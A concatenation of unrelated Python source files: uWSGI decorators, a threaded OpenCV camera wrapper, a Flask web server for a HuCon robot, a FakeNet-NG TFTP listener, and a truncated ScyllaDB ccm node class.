def manage_spool_request(vars):
# To check whether 'args' is in vals or not - decode the keys first,
# because in python3 all keys in 'vals' are have 'byte' types
vars = dict((_decode1(K), V) for (K, V) in vars.items())
if 'args' in vars:
for k in ('args', 'kwargs'):
vars[k] = pickle.loads(vars.pop(k))
vars = _decode_from_spooler(vars)
f = spooler_functions[vars['ud_spool_func']]
if 'args' in vars:
ret = f(*vars['args'], **vars['kwargs'])
else:
ret = f(vars)
return int(vars.get('ud_spool_ret', ret))
def postfork_chain_hook():
for f in postfork_chain:
f()
uwsgi.spooler = manage_spool_request
uwsgi.post_fork_hook = postfork_chain_hook
class postfork(object):
def __init__(self, f):
if callable(f):
self.wid = 0
self.f = f
else:
self.f = None
self.wid = f
postfork_chain.append(self)
def __call__(self, *args, **kwargs):
if self.f:
if self.wid > 0 and self.wid != uwsgi.worker_id():
return
return self.f()
self.f = args[0]
class _spoolraw(object):
def __call__(self, *args, **kwargs):
arguments = self.base_dict.copy()
if not self.pass_arguments:
if len(args) > 0:
arguments.update(args[0])
if kwargs:
arguments.update(kwargs)
else:
spooler_args = {}
for key in ('message_dict', 'spooler', 'priority', 'at', 'body'):
if key in kwargs:
spooler_args.update({key: kwargs.pop(key)})
arguments.update(spooler_args)
arguments.update(
{'args': pickle.dumps(args), 'kwargs': pickle.dumps(kwargs)})
return uwsgi.spool(_encode_to_spooler(arguments))
# For backward compatibility (uWSGI < 1.9.13)
def spool(self, *args, **kwargs):
return self.__class__.__call__(self, *args, **kwargs)
def __init__(self, f, pass_arguments):
if not 'spooler' in uwsgi.opt:
raise Exception(
"you have to enable the uWSGI spooler to use @%s decorator" % self.__class__.__name__)
self.f = f
spooler_functions[self.f.__name__] = self.f
# For backward compatibility (uWSGI < 1.9.13)
self.f.spool = self.__call__
self.pass_arguments = pass_arguments
self.base_dict = {'ud_spool_func': self.f.__name__}
class _spool(_spoolraw):
def __call__(self, *args, **kwargs):
self.base_dict['ud_spool_ret'] = str(uwsgi.SPOOL_OK)
return _spoolraw.__call__(self, *args, **kwargs)
class _spoolforever(_spoolraw):
def __call__(self, *args, **kwargs):
self.base_dict['ud_spool_ret'] = str(uwsgi.SPOOL_RETRY)
return _spoolraw.__call__(self, *args, **kwargs)
def spool_decorate(f=None, pass_arguments=False, _class=_spoolraw):
if not f:
return partial(_class, pass_arguments=pass_arguments)
return _class(f, pass_arguments)
def spoolraw(f=None, pass_arguments=False):
return spool_decorate(f, pass_arguments)
def spool(f=None, pass_arguments=False):
return spool_decorate(f, pass_arguments, _spool)
def spoolforever(f=None, pass_arguments=False):
return spool_decorate(f, pass_arguments, _spoolforever)
class mulefunc(object):
def __init__(self, f):
if callable(f):
self.fname = f.__name__
self.mule = 0
mule_functions[f.__name__] = f
else:
self.mule = f
self.fname = None
def real_call(self, *args, **kwargs):
uwsgi.mule_msg(pickle.dumps(
{
'service': 'uwsgi_mulefunc',
'func': self.fname,
'args': args,
'kwargs': kwargs
}
), self.mule)
def __call__(self, *args, **kwargs):
if not self.fname:
self.fname = args[0].__name__
mule_functions[self.fname] = args[0]
return self.real_call
return self.real_call(*args, **kwargs)
def mule_msg_dispatcher(message):
msg = pickle.loads(message)
if msg['service'] == 'uwsgi_mulefunc':
return mule_functions[msg['func']](*msg['args'], **msg['kwargs'])
uwsgi.mule_msg_hook = mule_msg_dispatcher
class rpc(object):
def __init__(self, name):
self.name = name
def __call__(self, f):
uwsgi.register_rpc(self.name, f)
return f
class farm_loop(object):
def __init__(self, f, farm):
self.f = f
self.farm = farm
def __call__(self):
if uwsgi.mule_id() == 0:
return
if not uwsgi.in_farm(self.farm):
return
while True:
message = uwsgi.farm_get_msg()
if message:
self.f(message)
class farm(object):
def __init__(self, name=None, **kwargs):
self.name = name
def __call__(self, f):
postfork_chain.append(farm_loop(f, self.name))
class mule_brain(object):
def __init__(self, f, num):
self.f = f
self.num = num
def __call__(self):
if uwsgi.mule_id() == self.num:
try:
self.f()
except:
exc = sys.exc_info()
sys.excepthook(exc[0], exc[1], exc[2])
sys.exit(1)
class mule_brainloop(mule_brain):
def __call__(self):
if uwsgi.mule_id() == self.num:
while True:
try:
self.f()
except:
exc = sys.exc_info()
sys.excepthook(exc[0], exc[1], exc[2])
sys.exit(1)
class mule(object):
def __init__(self, num):
self.num = num
def __call__(self, f):
postfork_chain.append(mule_brain(f, self.num))
class muleloop(mule):
def __call__(self, f):
postfork_chain.append(mule_brainloop(f, self.num))
class mulemsg_loop(object):
def __init__(self, f, num):
self.f = f
self.num = num
def __call__(self):
if uwsgi.mule_id() == self.num:
while True:
message = uwsgi.mule_get_msg()
if message:
self.f(message)
class mulemsg(object):
def __init__(self, num):
self.num = num
def __call__(self, f):
postfork_chain.append(mulemsg_loop(f, self.num))
class signal(object):
def __init__(self, num, **kwargs):
self.num = num
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
return f
class timer(object):
def __init__(self, secs, **kwargs):
self.num = kwargs.get('signum', get_free_signal())
self.secs = secs
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
uwsgi.add_timer(self.num, self.secs)
return f
class cron(object):
def __init__(self, minute, hour, day, month, dayweek, **kwargs):
self.num = kwargs.get('signum', get_free_signal())
self.minute = minute
self.hour = hour
self.day = day
self.month = month
self.dayweek = dayweek
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
uwsgi.add_cron(self.num, self.minute, self.hour,
self.day, self.month, self.dayweek)
return f
class rbtimer(object):
def __init__(self, secs, **kwargs):
self.num = kwargs.get('signum', get_free_signal())
self.secs = secs
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
uwsgi.add_rb_timer(self.num, self.secs)
return f
class filemon(object):
def __init__(self, fsobj, **kwargs):
self.num = kwargs.get('signum', get_free_signal())
self.fsobj = fsobj
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
uwsgi.add_file_monitor(self.num, self.fsobj)
return f
class erlang(object):
def __init__(self, name):
self.name = name
def __call__(self, f):
uwsgi.erlang_register_process(self.name, f)
return f
class lock(object):
def __init__(self, f):
self.f = f
def __call__(self, *args, **kwargs):
# ensure the spooler will not call it
if uwsgi.i_am_the_spooler():
return
uwsgi.lock()
try:
return self.f(*args, **kwargs)
finally:
uwsgi.unlock()
class thread(object):
def __init__(self, f):
self.f = f
def __call__(self, *args):
t = Thread(target=self.f, args=args)
t.daemon = True
t.start()
return self.f
class harakiri(object):
def __init__(self, seconds):
self.s = seconds
def real_call(self, *args, **kwargs):
uwsgi.set_user_harakiri(self.s)
r = self.f(*args, **kwargs)
uwsgi.set_user_harakiri(0)
return r
def __call__(self, f):
self.f = f
return self.real_call
|
camera.py
|
"""
camera.py
Camera.py é resposável por fazer a ativação da câmera através de threads. Através dela, outras classes e métodos conseguem
instanciá-la quando necessário para captura de imagens ou até mesmo fazer capturas ininterruptas até que a thread seja finalizada.
"""
from threading import Thread
import cv2
class Camera:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
webserver.py
|
#!/usr/bin/python
""" webserver.py - Flask based web server to handle all legal requests.
Copyright (C) 2019 Basler AG
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
import http
def set_led(red, green, blue):
""" Use the hucon eye driver to set the eye color.
"""
try:
from hucon import Eye
Eye(1, Eye.RGB).set_color(red, green, blue)
Eye(2, Eye.RGB).set_color(red, green, blue)
Eye(3, Eye.RGB).set_color(red, green, blue)
Eye(4, Eye.RGB).set_color(red, green, blue)
except Exception as ex:
print(ex)
# Set the led eyes to yellow at the beginning
set_led(249, 166, 2)
import argparse
import logging
import threading
import time
try:
import httplib
except:
import http.client as httplib
from flask import Flask
from flask import request
from flask import render_template
from flask_socketio import SocketIO
from HuConJsonRpc import HuConJsonRpc
json_rpc = HuConJsonRpc()
COLLECT_STATIC_ROOT = "/opt/hucon/webserver/static"
COLLECT_STORAGE = 'flask_collect.storage.file'
app = Flask(json_rpc._SERVER_NAME)
app.config["SECRET_KEY"] = "SECRET_KEY"
socketio = SocketIO(app, logger=True)#, async_mode='eventlet'
@app.context_processor
def detect_browser_language():
""" Returns the current user browser language.
"""
supported_browser_languages = ["en", "de"]
lang = request.accept_languages.best_match(supported_browser_languages)
if lang == None:
lang = 'en'
return dict(browser_language=lang)
@app.route('/')
@app.route('/index.html')
def index():
""" Returns index page
"""
return render_template('index.html')
@app.route('/blockly.html')
def blockly():
""" Returns blockly programming page
"""
return render_template('blockly.html')
@app.route('/editor.html')
def editor():
""" Returns python editor page
"""
return render_template('editor.html')
@app.route('/mobile.html')
def mobile():
""" Returns mobile page
"""
return render_template('mobile.html')
@app.route('/settings.html')
def settings():
""" Returns settings page
"""
return render_template('settings.html')
@app.route('/remote_control.html')
def remote_control():
""" Returns remote control page
"""
return render_template('remote_control.html')
@app.route('/API', methods=['GET', 'POST'])
def api():
""" Returns api page or handle the request on POST
"""
if request.method == 'POST':
data = request.get_json(force=True)
if not data:
return ('Bad Request.', 400)
return json_rpc.handle_control(data)
return render_template('api.html')
@app.before_first_request
def before_first_request():
""" Set the eyes to green and after a while to off.
This will gibe the user teh ability to see that the service is running.
"""
set_led(0, 255, 0)
time.sleep(2)
set_led(0, 0, 0)
def check_service():
""" Check if the page is running.
"""
not_started = True
while not_started:
time.sleep(10)
try:
conn = http.client.HTTPConnection('localhost', json_rpc._LISTENING_PORT, timeout=5)
conn.request('GET', '/')
res = conn.getresponse()
if res.status == 200:
not_started = False
except Exception as ex:
print(ex)
if __name__ == '__main__':
""" Create the Server and listen on each incoming request.
"""
parser = argparse.ArgumentParser(description='Start the %s web server.' % json_rpc._SERVER_NAME)
parser.add_argument('--debug',
dest='debug',
action='store_true',
help='Print more debug messages on the console during running.')
args = parser.parse_args()
if not args.debug:
# Reduce the log messages.
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# Run a thread to check the flask service.
# thread = threading.Thread(target=check_service)
# thread.start()
socketio.start_background_task(target=check_service)
socketio.run(app, host='0.0.0.0', port=json_rpc._LISTENING_PORT, debug=args.debug)
|
TFTPListener.py
|
import logging
import os
import sys
import threading
import SocketServer
import socket
import struct
import urllib
from . import *
EXT_FILE_RESPONSE = {
'.html': 'FakeNet.html',
'.png' : 'FakeNet.png',
'.ico' : 'FakeNet.ico',
'.jpeg': 'FakeNet.jpg',
'.exe' : 'FakeNetMini.exe',
'.pdf' : 'FakeNet.pdf',
'.xml' : 'FakeNet.html',
'.txt' : 'FakeNet.txt',
}
OPCODE_RRQ = "\x00\x01"
OPCODE_WRQ = "\x00\x02"
OPCODE_DATA = "\x00\x03"
OPCODE_ACK = "\x00\x04"
OPCODE_ERROR = "\x00\x05"
BLOCKSIZE = 512
class TFTPListener():
def taste(self, data, dport):
max_filename_size = 128
max_mode_size = len('netascii')
max_rrq_wrq_len = max_filename_size + max_mode_size + 4
min_rrq_wrq_len = 6
min_data_size = 5
max_data_size = BLOCKSIZE + 4
ack_size = 4
min_error_size = 5 + 1
max_error_msg_size = 128
max_error_size = 5 + max_error_msg_size
confidence = 1 if dport == 69 else 0
stripped = data.lstrip()
if (stripped.startswith(OPCODE_RRQ) or
stripped().startswith(OPCODE_WRQ)):
if len(data) >= min_rrq_wrq_len and len(data) <= max_rrq_wrq_len:
confidence += 2
elif stripped.startswith(OPCODE_DATA):
if len(data) >= min_data_size and len(data) <= max_data_size:
confidence += 2
elif stripped.startswith(OPCODE_ACK):
if len(data) == ack_size:
confidence += 2
elif stripped.startswith(OPCODE_ERROR):
if len(data) >= min_error_size and len(data) <= max_error_size:
confidence += 2
return confidence
def __init__(self,
config,
name='TFTPListener',
logging_level=logging.INFO,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = '0.0.0.0'
self.server = None
self.name = 'TFTP'
self.port = self.config.get('port', 69)
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
path = self.config.get('tftproot', 'defaultFiles')
self.tftproot_path = ListenerBase.abs_config_path(path)
if self.tftproot_path is None:
self.logger.error('Could not locate tftproot directory: %s', path)
sys.exit(1)
self.tftp_file_prefix = self.config.get('tftpfileprefix', 'tftp')
def start(self):
self.logger.info('Starting...')
# Start listener
self.server = ThreadedUDPServer((self.local_ip, int(self.config['port'])), ThreadedUDPRequestHandler)
self.server.logger = self.logger
self.server.config = self.config
self.server.tftproot_path = self.tftproot_path
self.server.tftp_file_prefix = self.tftp_file_prefix
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.debug('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
class ThreadedUDPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
(data,socket) = self.request
if not data:
return
opcode = data[:2]
if opcode == OPCODE_RRQ:
filename, mode = self.parse_rrq_wrq_packet(data)
self.server.logger.info('Received request to download %s', filename)
self.handle_rrq(socket, filename)
elif opcode == OPCODE_WRQ:
filename, mode = self.parse_rrq_wrq_packet(data)
self.server.logger.info('Received request to upload %s', filename)
self.handle_wrq(socket, filename)
elif opcode == OPCODE_ACK:
block_num = struct.unpack('!H', data[2:4])[0]
self.server.logger.debug('Received ACK for block %d', block_num)
elif opcode == OPCODE_DATA:
self.handle_data(socket, data)
elif opcode == OPCODE_ERROR:
error_num = struct.unpack('!H', data[2:4])[0]
error_msg = data[4:]
self.server.logger.info('Received error message %d:%s', error_num, error_msg)
else:
self.server.logger.error('Unknown opcode: %d', struct.unpack('!H', data[:2])[0])
except Exception, e:
self.server.logger.error('Error: %s', e)
raise e
def handle_data(self, socket, data):
block_num = struct.unpack('!H', data[2:4])[0]
if hasattr(self.server, 'filename_path') and self.server.filename_path:
safe_file = self.server.tftp_file_prefix + "_" + urllib.quote(self.server.filename_path, '')
output_file = ListenerBase.safe_join(os.getcwd(),
safe_file)
f = open(output_file, 'ab')
f.write(data[4:])
f.close()
# Send ACK packet for the given block number
ack_packet = OPCODE_ACK + data[2:4]
socket.sendto(ack_packet, self.client_address)
else:
self.server.logger.error('Received DATA packet but don\'t know where to store it.')
def handle_rrq(self, socket, filename):
filename_path = ListenerBase.safe_join(self.server.tftproot_path,
filename)
# If virtual filename does not exist return a default file based on extention
if not os.path.isfile(filename_path):
file_basename, file_extension = os.path.splitext(filename)
# Calculate absolute path to a fake file
filename_path = ListenerBase.safe_join(self.server.tftproot_path,
EXT_FILE_RESPONSE.get(file_extension.lower(), u'FakeNetMini.exe'))
self.server.logger.debug('Sending file %s', filename_path)
f = open(filename_path, 'rb')
i = 1
while True:
# Read in a buffer of blocksize from the file
data_block = f.read(BLOCKSIZE)
if not data_block or len(data_block) == 0:
break
data_packet = OPCODE_DATA + struct.pack('!H', i) + data_block
socket.sendto(data_packet, self.client_address)
i += 1
f.close()
def handle_wrq(self, socket, filename):
self.server.filename_path = filename
# Send acknowledgement so the client will begin writing
ack_packet = OPCODE_ACK + "\x00\x00"
socket.sendto(ack_packet, self.client_address)
def parse_rrq_wrq_packet(self, data):
filename, mode, _ = data[2:].split("\x00", 2)
return (filename, mode)
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
pass
###############################################################################
# Testing code
def test(config):
pass
def main():
"""
Run from the flare-fakenet-ng root dir with the following command:
python2 -m fakenet.listeners.TFTPListener
"""
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '69', 'protocol': 'udp', 'tftproot': 'defaultFiles'}
listener = TFTPListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
#test(config)
listener.stop()
if __name__ == '__main__':
main()
|
scylla_node.py
|
# ccm node
from __future__ import with_statement
from datetime import datetime
import errno
import os
import signal
import shutil
import socket
import stat
import subprocess
import time
import threading
from distutils.version import LooseVersion
import psutil
import yaml
import glob
import re
from ccmlib.common import CASSANDRA_SH, BIN_DIR
from six import print_
from six.moves import xrange
from ccmlib import common
from ccmlib.node import Node, NodeUpgradeError
from ccmlib.node import Status
from ccmlib.node import NodeError
from ccmlib.node import TimeoutError
from ccmlib.scylla_repository import setup, CORE_PACKAGE_DIR_NAME, SCYLLA_VERSION_FILE
def wait_for(func, timeout, first=0.0, step=1.0, text=None):
"""
Wait until func() evaluates to True.
If func() evaluates to True before timeout expires, return the
value of func(). Otherwise return None.
:param func: Function that will be evaluated.
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param step: Time to sleep between attempts in seconds
:param text: Text to print while waiting, for debug purposes
"""
start_time = time.time()
end_time = time.time() + timeout
time.sleep(first)
while time.time() < end_time:
if text:
print_("%s (%f secs)" % (text, (time.time() - start_time)))
output = func()
if output:
return output
time.sleep(step)
return None
class ScyllaNode(Node):
"""
Provides interactions to a Scylla node.
"""
def __init__(self, name, cluster, auto_bootstrap, thrift_interface,
storage_interface, jmx_port, remote_debug_port, initial_token,
save=True, binary_interface=None, scylla_manager=None):
self._node_install_dir = None
self._node_scylla_version = None
super(ScyllaNode, self).__init__(name, cluster, auto_bootstrap,
thrift_interface, storage_interface,
jmx_port, remote_debug_port,
initial_token, save, binary_interface)
self.__global_log_level = 'info'
self.__classes_log_level = {}
self.get_cassandra_version()
self._process_jmx = None
self._process_jmx_waiter = None
self._process_scylla = None
self._process_scylla_waiter = None
self._process_agent = None
self._process_agent_waiter = None
self._smp = 1
self._smp_set_during_test = False
self._mem_mb_per_cpu = 512
self._mem_set_during_test = False
self.__conf_updated = False
self.scylla_manager = scylla_manager
self.jmx_pid = None
self.agent_pid = None
self.upgraded = False
self.upgrader = NodeUpgrader(node=self)
self._create_directory()
@property
def node_install_dir(self):
if not self._node_install_dir:
self._node_install_dir = self.get_install_dir()
return self._node_install_dir
@node_install_dir.setter
def node_install_dir(self, install_dir):
self._node_install_dir = install_dir
@property
def node_scylla_version(self):
if not self._node_scylla_version:
self._node_scylla_version = self.get_node_scylla_version()
return self._node_scylla_version
@node_scylla_version.setter
def node_scylla_version(self, install_dir):
self._node_scylla_version = self.get_node_scylla_version(install_dir)
def scylla_mode(self):
return self.cluster.get_scylla_mode()
def is_scylla_reloc(self):
return self.cluster.is_scylla_reloc()
def set_smp(self, smp):
self._smp = smp
self._smp_set_during_test = True
def set_mem_mb_per_cpu(self, mem):
self._mem_mb_per_cpu = mem
self._mem_set_during_test = True
def get_install_cassandra_root(self):
return self.get_tools_java_dir()
def get_node_cassandra_root(self):
return os.path.join(self.get_path())
def get_conf_dir(self):
"""
Returns the path to the directory where Cassandra config are located
"""
return os.path.join(self.get_path(), 'conf')
def get_tool(self, toolname):
return common.join_bin(self.get_tools_java_dir(), BIN_DIR, toolname)
def get_tool_args(self, toolname):
raise NotImplementedError('ScyllaNode.get_tool_args')
def get_env(self):
update_conf = not self.__conf_updated
if update_conf:
self.__conf_updated = True
return common.make_cassandra_env(self.get_install_cassandra_root(),
self.get_node_cassandra_root(), update_conf=update_conf)
def get_cassandra_version(self):
# TODO: Handle versioning
return '3.0'
def set_log_level(self, new_level, class_name=None):
known_level = {'TRACE' : 'trace', 'DEBUG' : 'debug', 'INFO' : 'info', 'WARN' : 'warn', 'ERROR' : 'error', 'OFF' : 'info'}
if not new_level in known_level:
raise common.ArgumentError("Unknown log level %s (use one of %s)" % (new_level, " ".join(known_level)))
new_log_level = known_level[new_level]
# TODO class_name can be validated against help-loggers
if class_name:
self.__classes_log_level[class_name] = new_log_level
else:
self.__global_log_level = new_log_level
return self
def set_workload(self, workload):
raise NotImplementedError('ScyllaNode.set_workload')
def cpuset(self, id, count, cluster_id):
# leaving one core for other executables to run
allocated_cpus = psutil.cpu_count() - 1
start_id = (id * count + cluster_id) % allocated_cpus
cpuset = []
for cpuid in xrange(start_id, start_id + count):
cpuset.append(str(cpuid % allocated_cpus))
return cpuset
def _wait_for_jmx(self):
if self._process_jmx:
self._process_jmx.wait()
def _wait_for_scylla(self):
if self._process_scylla:
self._process_scylla.wait()
def _wait_for_agent(self):
if self._process_agent:
self._process_agent.wait()
def _start_jmx(self, data):
jmx_jar_dir = os.path.join(self.get_path(), BIN_DIR)
jmx_java_bin = os.path.join(jmx_jar_dir, 'symlinks', 'scylla-jmx')
jmx_jar = os.path.join(jmx_jar_dir, 'scylla-jmx-1.0.jar')
args = [jmx_java_bin,
'-Dapiaddress=%s' % data['listen_address'],
'-Djavax.management.builder.initial=com.scylladb.jmx.utils.APIBuilder',
'-Dcom.sun.management.jmxremote',
'-Dcom.sun.management.jmxremote.port=%s' % self.jmx_port,
'-Dcom.sun.management.jmxremote.rmi.port=%s' % self.jmx_port,
'-Dcom.sun.management.jmxremote.local.only=false',
'-Xmx256m',
'-XX:+UseSerialGC',
'-Dcom.sun.management.jmxremote.authenticate=false',
'-Dcom.sun.management.jmxremote.ssl=false',
'-jar',
jmx_jar]
log_file = os.path.join(self.get_path(), 'logs', 'system.log.jmx')
env_copy = os.environ
env_copy['SCYLLA_HOME'] = self.get_path()
with open(log_file, 'a') as jmx_log:
self._process_jmx = subprocess.Popen(args, stdout=jmx_log, stderr=jmx_log, close_fds=True, env=env_copy)
self._process_jmx.poll()
# When running on ccm standalone, the waiter thread would block
# the create commands. Besides in that mode, waiting is unnecessary,
# since the original popen reference is garbage collected.
standalone = os.environ.get('SCYLLA_CCM_STANDALONE', None)
if standalone is None:
self._process_jmx_waiter = threading.Thread(target=self._wait_for_jmx)
# Don't block the main thread on abnormal shutdown
self._process_jmx_waiter.daemon = True
self._process_jmx_waiter.start()
pid_filename = os.path.join(self.get_path(), 'scylla-jmx.pid')
with open(pid_filename, 'w') as pid_file:
pid_file.write(str(self._process_jmx.pid))
# Wait for a starting node until is starts listening for CQL.
# Possibly poll the log for long-running offline processes, like
# bootstrap or resharding.
# Return True iff detected bootstrap or resharding processes in the log
def wait_for_starting(self, from_mark=None, timeout=120):
if from_mark is None:
from_mark = self.mark_log()
process=self._process_scylla
starting_message = 'Starting listening for CQL clients'
bootstrap_message = 'storage_service - JOINING: Starting to bootstrap'
resharding_message = r'(compaction|database) -.*Resharding'
if not self.watch_log_for("{}|{}|{}".format(starting_message, bootstrap_message, resharding_message), from_mark=from_mark, timeout=timeout, process=process):
return False
prev_mark = from_mark
prev_mark_time = time.time()
sleep_time = 10 if timeout >= 100 else 1
while not self.grep_log(starting_message, from_mark=from_mark):
process.poll()
if process.returncode is not None:
self.print_process_output(self.name, process, verbose=True)
if process.returncode != 0:
raise RuntimeError("The process is dead, returncode={}".format(process.returncode))
repair_pattern = r'repair - Repair \d+ out of \d+ ranges'
streaming_pattern = r'range_streamer - Bootstrap .* streaming .* ranges'
resharding_pattern = r'(compaction|database) -.*Resharded'
if self.grep_log("{}|{}|{}".format(repair_pattern, streaming_pattern, resharding_pattern), from_mark=prev_mark):
prev_mark = self.mark_log()
prev_mark_time = time.time()
elif time.time() - prev_mark_time >= timeout:
raise TimeoutError("{}: Timed out waiting for '{}'".format(self.name, starting_message))
time.sleep(sleep_time)
return bool(self.grep_log("{}|{}".format(bootstrap_message, resharding_message), from_mark=from_mark))
def _start_scylla(self, args, marks, update_pid, wait_other_notice,
wait_for_binary_proto, ext_env, timeout=None):
log_file = os.path.join(self.get_path(), 'logs', 'system.log')
# In case we are restarting a node
# we risk reading the old cassandra.pid file
self._delete_old_pid()
try:
env_copy = self._launch_env
except AttributeError:
env_copy = os.environ
env_copy['SCYLLA_HOME'] = self.get_path()
env_copy.update(ext_env)
with open(log_file, 'a') as scylla_log:
self._process_scylla = \
subprocess.Popen(args, stdout=scylla_log, stderr=scylla_log, close_fds=True, env=env_copy)
self._process_scylla.poll()
# When running on ccm standalone, the waiter thread would block
# the create commands. Besides in that mode, waiting is unnecessary,
# since the original popen reference is garbage collected.
standalone = os.environ.get('SCYLLA_CCM_STANDALONE', None)
if standalone is None:
self._process_scylla_waiter = threading.Thread(target=self._wait_for_scylla)
# Don't block the main thread on abnormal shutdown
self._process_scylla_waiter.daemon = True
self._process_scylla_waiter.start()
pid_filename = os.path.join(self.get_path(), 'cassandra.pid')
with open(pid_filename, 'w') as pid_file:
pid_file.write(str(self._process_scylla.pid))
if update_pid:
self._update_pid(self._process_scylla)
if not self.is_running():
raise NodeError("Error starting node %s" % self.name,
self._process_scylla)
if wait_other_notice:
for node, mark in marks:
t = timeout if timeout is not None else 120 if self.cluster.scylla_mode != 'debug' else 360
node.watch_log_for_alive(self, from_mark=mark, timeout=t)
if wait_for_binary_proto:
try:
t = timeout * 4 if timeout is not None else 420 if self.cluster.scylla_mode != 'debug' else 900
self.wait_for_binary_interface(from_mark=self.mark, process=self._process_scylla, timeout=t)
except TimeoutError as e:
if not self.wait_for_starting(from_mark=self.mark):
raise e
pass
return self._process_scylla
def _create_agent_config(self):
conf_file = os.path.join(self.get_conf_dir(), 'scylla-manager-agent.yaml')
ssl_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'scylla_test_ssl')
data = dict()
data['https'] = "{}:10001".format(self.address())
data['auth_token'] = self.scylla_manager.auth_token
data['tls_cert_file'] = os.path.join(ssl_dir, 'scylla-manager-agent.crt')
data['tls_key_file'] = os.path.join(ssl_dir, 'scylla-manager-agent.key')
data['logger'] = dict(level='debug')
data['debug'] = "{}:56112".format(self.address())
data['scylla'] = {'api_address': "{}".format(self.address()),
'api_port': 10000}
data['prometheus'] = "{}:56090".format(self.address())
data['s3'] = {"endpoint": os.getenv("AWS_S3_ENDPOINT"), "provider": "Minio"}
with open(conf_file, 'w') as f:
yaml.safe_dump(data, f, default_flow_style=False)
return conf_file
def update_agent_config(self, new_settings, restart_agent_after_change=True):
conf_file = os.path.join(self.get_conf_dir(), 'scylla-manager-agent.yaml')
with open(conf_file, 'r') as f:
current_config = yaml.safe_load(f)
current_config.update(new_settings)
with open(conf_file, 'w') as f:
yaml.safe_dump(current_config, f, default_flow_style=False)
if restart_agent_after_change:
self.restart_scylla_manager_agent(gently=True, recreate_config=False)
def start_scylla_manager_agent(self, create_config=True):
agent_bin = os.path.join(self.scylla_manager._get_path(), BIN_DIR, 'scylla-manager-agent')
log_file = os.path.join(self.get_path(), 'logs', 'system.log.manager_agent')
if create_config:
config_file = self._create_agent_config()
else:
config_file = os.path.join(self.get_conf_dir(), 'scylla-manager-agent.yaml')
args = [agent_bin,
'--config-file', config_file]
with open(log_file, 'a') as agent_log:
self._process_agent = subprocess.Popen(args, stdout=agent_log, stderr=agent_log, close_fds=True)
self._process_agent.poll()
# When running on ccm standalone, the waiter thread would block
# the create commands. Besides in that mode, waiting is unnecessary,
# since the original popen reference is garbage collected.
standalone = os.environ.get('SCYLLA_CCM_STANDALONE', None)
if standalone is None:
self._process_agent_waiter = threading.Thread(target=self._wait_for_agent)
# Don't block the main thread on abnormal shutdown
self._process_agent_waiter.daemon = True
self._process_agent_waiter.start()
pid_filename = os.path.join(self.get_path(), 'scylla-agent.pid')
with open(pid_filename, 'w') as pid_file:
pid_file.write(str(self._process_agent.pid))
with open(config_file, 'r') as f:
current_config = yaml.safe_load(f)
# Extracting currently configured port
current_listening_port = int(current_config['https'].split(":")[1])
api_interface = common.parse_interface(self.address(), current_listening_port)
if not common.check_socket_listening(api_interface, timeout=180):
raise Exception(
"scylla manager agent interface %s:%s is not listening after 180 seconds, scylla manager agent may have failed to start."
% (api_interface[0], api_interface[1]))
def restart_scylla_manager_agent(self, gently, recreate_config=True):
self.stop_scylla_manager_agent(gently=gently)
self.start_scylla_manager_agent(create_config=recreate_config)
def stop_scylla_manager_agent(self, gently):
if gently:
try:
self._process_agent.terminate()
except OSError:
pass
else:
try:
self._process_agent.kill()
except OSError:
pass
def _wait_java_up(self, ip_addr, jmx_port):
java_up = False
iteration = 0
while not java_up and iteration < 30:
iteration += 1
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as _socket:
try:
_socket.settimeout(1.0)
_socket.connect((ip_addr, jmx_port))
java_up = True
try:
_socket.close()
except:
pass
except (socket.timeout, ConnectionRefusedError):
pass
time.sleep(1)
return java_up
@property
def node_install_dir_version(self):
if not self.node_install_dir:
return ""
scylla_version_file_path = os.path.join(self.node_install_dir, CORE_PACKAGE_DIR_NAME, SCYLLA_VERSION_FILE)
if not os.path.exists(scylla_version_file_path):
print(f"'{scylla_version_file_path}' wasn't found")
return ""
with open(scylla_version_file_path, 'r') as f:
version = f.readline()
return version.strip()
# Scylla Overload start
def start(self, join_ring=True, no_wait=False, verbose=False,
update_pid=True, wait_other_notice=None, replace_token=None,
replace_address=None, jvm_args=None, wait_for_binary_proto=None,
profile_options=None, use_jna=False, quiet_start=False):
"""
Start the node. Options includes:
- join_ring: if false, start the node with -Dcassandra.join_ring=False
- no_wait: by default, this method returns when the node is started
and listening to clients.
If no_wait=True, the method returns sooner.
- wait_other_notice: if True, this method returns only when all other
live node of the cluster
have marked this node UP.
- replace_token: start the node with the -Dcassandra.replace_token
option.
- replace_address: start the node with the
-Dcassandra.replace_address option.
Extra command line options may be passed using the
